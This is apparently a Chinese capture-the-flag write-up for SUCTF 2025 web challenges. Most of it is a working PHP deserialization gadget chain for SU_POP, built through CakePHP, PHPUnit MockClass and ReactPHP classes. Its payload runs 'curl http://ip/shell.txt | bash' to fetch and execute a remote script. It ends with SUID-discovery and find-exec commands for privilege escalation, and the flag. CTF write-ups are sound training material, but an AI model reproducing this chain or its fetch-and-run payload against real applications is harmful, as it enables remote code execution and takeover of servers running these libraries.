2025SUCTF 复现wp

2025SUCTF

Web

SU_blog

• 首先注册，尝试admin，可以注册

• 后来发现这里是如果不是注册admin，是需要伪造cookie，爆破时间戳的，非预期了

SU_POP

• EXP
• 参考一位师傅的EXP，先记录着，还没来得及仔细分析链子的细节和项目结构，后面和cakephp放一起分析

<?php
namespace PHPUnit\Framework\MockObject\Generator;
 
class MockClass
{
    public $classCode;
    public $mockName;
    public function __construct() {
        $this->classCode ="system('curl http://ip/shell.txt | bash');";
        $this->mockName = "XU17";
    }
}
 
namespace Cake\ORM;
 
use PHPUnit\Framework\MockObject\Generator\MockClass;
 
class BehaviorRegistry
{
    public $_methodMap;
    public $_loaded;
 
    public function __construct() {
        $this->_methodMap = ["rewind" => ["XU17", "generate"]];
        $this->_loaded = ["XU17" => new MockClass()];
    }
}
 
class Table
{
    public $_behaviors;
    public function __construct() {
        $this->_behaviors = new BehaviorRegistry();
    }
}
 
namespace Cake\Http;
 
use Cake\ORM\Table;
 
class Response
{
    public $stream;
    public function __construct() {
        $this->stream = new Table();
    }
}
 
namespace React\Promise\Internal;
 
use Cake\Http\Response;
 
final class RejectedPromise
{
    public $reason;
    public function __construct() {
        $this->reason = new Response();
    }
}
 
$a=new RejectedPromise();
echo base64_encode(serialize($a));

find / -perm -u=s -type f 2>/dev/null

find . -exec cat /f* \;

SUCTF{PoP_CHaiN5_@Re_SO_fUn!!!}